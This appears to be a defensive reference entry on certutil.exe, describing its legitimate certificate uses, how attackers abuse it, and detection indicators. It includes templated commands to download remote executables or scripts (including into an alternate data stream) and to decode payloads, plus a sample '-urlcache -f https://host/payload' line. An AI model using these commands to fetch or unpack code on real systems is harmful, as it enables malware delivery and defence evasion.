Process
certutil.exe
certutil.exe is a Windows command-line tool for working with certificates and Certificate Services. Administrators use it to inspect, request, and manage certificates and certificate authorities, and to verify file hashes. The same binary can also download files and base64 encode or decode data, which is why it has become a favorite living-off-the-land tool for attackers.
File identity
Not observed.
Not observed.
Not observed.
Not observed.
Execution context
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Ancestry
Not observed.
Not observed.
Not observed.
Not observed.
Behavior
Not observed.
Not observed.
Not observed.
Not observed.
certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}Download · Download file from Internetcertutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}Download · Download file from Internetcertutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:tttADS · Download file from Internet and save it in an NTFS Alternate Data Streamcertutil.exe -URL {REMOTEURL:.exe}Download · Download file from Internetcertutil -encode {PATH} {PATH:.base64}Encode · Encode files to evade defensive measurescertutil -decode {PATH:.base64} {PATH}Decode · Decode files to evade defensive measurescertutil -decodehex {PATH:.hex} {PATH}Decode · Decode files to evade defensive measures
Indicators
Not observed.
Analysis
certutil.exe is the command-line interface to the Windows certificate and Certificate Services stack. Its intended job is certificate administration: dumping and verifying certificates, requesting them from a certificate authority, managing a CA, and checking revocation. The genuine binary lives at C:\Windows\System32\certutil.exe, with a 32-bit copy under SysWOW64.
Alongside the certificate work it carries general-purpose helpers that have nothing to do with PKI. -hashfile computes a file's MD5, SHA1, or SHA256. -encode and -decode convert data to and from base64. -urlcache and -verifyctl can fetch a file from a URL. These are all documented features, but together they turn certutil into a download-and-decode utility that happens to be signed by Microsoft and present on every Windows machine.
Legitimately, certutil is run by administrators, by enrollment and PKI scripts, and by the Task Scheduler in certificate-management contexts. On an ordinary workstation it is uncommon. What a given instance is doing is written in its command-line verb.
certutil.exe is one of the most used download tools on Windows (T1105). A command line such as certutil -urlcache -split -f https://host/payload makes the signed binary pull a file from the internet, and because the binary is trusted and built in, the transfer hides behind a name that belongs on every machine. Network activity from certutil is itself unusual and worth treating as a lead.
It is equally useful for unpacking payloads (T1140). Attackers ship a base64-encoded file to slip past content scanners, then run certutil -decode on the host to restore the original executable or script. The reverse, -encode, is used to obfuscate data on the way out (T1027). A -decode that yields a PE or a script is a strong signal.
In every case the binary is the genuine signed certutil, so path and signature checks pass and even application-control rules that trust Microsoft binaries let it run. The command-line verb and the parent are where the intent shows.
- Image path other than
C:\Windows\System32\certutil.exeor itsSysWOW64copyhigh - A URL on the command line, especially with
-urlcacheor-verifyctlhigh -decodeor-decodehexproducing an executable or scripthigh- Parent is an Office application,
cmd.exe,powershell.exe,wscript.exe,cscript.exe, ormshta.exehigh - Outbound network connections from certutilhigh
-encodeof a local file, then the output sent elsewhere (staging)med- Output written to a user-writable path (
Temp,AppData,Downloads)med
Telemetry
Not observed.
Not observed.